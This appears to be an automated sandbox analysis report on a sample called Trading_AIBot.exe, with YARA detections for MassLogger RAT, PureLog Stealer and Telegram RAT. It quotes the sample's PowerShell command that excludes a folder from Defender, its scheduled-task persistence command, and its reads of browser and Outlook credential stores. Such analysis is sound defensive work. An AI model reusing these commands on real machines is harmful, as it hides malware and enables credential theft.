                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:14 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" Jump to behavior
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFProcess created: C:\Users\Public\Libraries\rpkhzpuO.pif C:\Users\Public\Libraries\rpkhzpuO.pif
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02C35A78
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,6_2_02C3A798
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: GetLocaleInfoA,6_2_02C3A74C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,6_2_02C35B84
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,10_1_00417A20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,24_2_00417A20
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,25_2_02DB5A78
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: GetLocaleInfoA,25_2_02DBA798
                      Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,25_2_02DB5B83
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,29_2_00417A20
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: GetLocaleInfoA,29_1_00417A20
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsofts.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\rpkhzpuO.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C39194 GetLocalTime,6_2_02C39194
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_02C3B714 GetVersionExA,6_2_02C3B714
                      Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b93f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.rpkhzpuO.pif.2ffbae98.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0f08.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26485570.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.34b30000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b94e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b94e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f76478.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed3f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed4e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32fb3d90.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f76478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.25380000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed3f56.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32fb3d90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b93f56.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rpkhzpuO.pif.2d0de3e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.rpkhzpuO.pif.234e1460.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0f08.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.rpkhzpuO.pif.234e1460.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26486478.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rpkhzpuO.pif.2d0de3e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26486478.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.34b30000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f75570.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0f08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.264c3d90.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.264c3d90.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26485570.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f75570.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.25380000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed4e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.rpkhzpuO.pif.2ffbae98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.2745277954.0000000034B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.2772871636.00000000234E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.2448553311.000000002D0DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2871352037.0000000025380000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2881899810.0000000026485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2741756362.00000000343B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2718853988.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2869962358.00000000250F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.2609245491.000000002FFBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.2869415210.0000000024E93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2740855997.0000000032F75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000002.4634725765.000000000269F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.4634725765.0000000002794000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 13.0.Microsofts.exe.350000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000D.00000000.2475752594.0000000000352000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 1664, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b93f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.rpkhzpuO.pif.2ffbae98.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0f08.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26485570.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.34b30000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b94e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b94e5e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f76478.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed3f56.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed4e5e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32fb3d90.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f76478.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.25380000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.24ed3f56.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32fb3d90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.31b93f56.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rpkhzpuO.pif.2d0de3e8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.rpkhzpuO.pif.234e1460.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0f08.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.3.rpkhzpuO.pif.234e1460.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26486478.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rpkhzpuO.pif.2d0de3e8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.26486478.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0f08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.34b30000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.32f75570.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.rpkhzpuO.pif.343b0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.250f0f08.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.rpkhzpuO.pif.264c3d90.11.raw.unpack, type: UNPACKEDPE
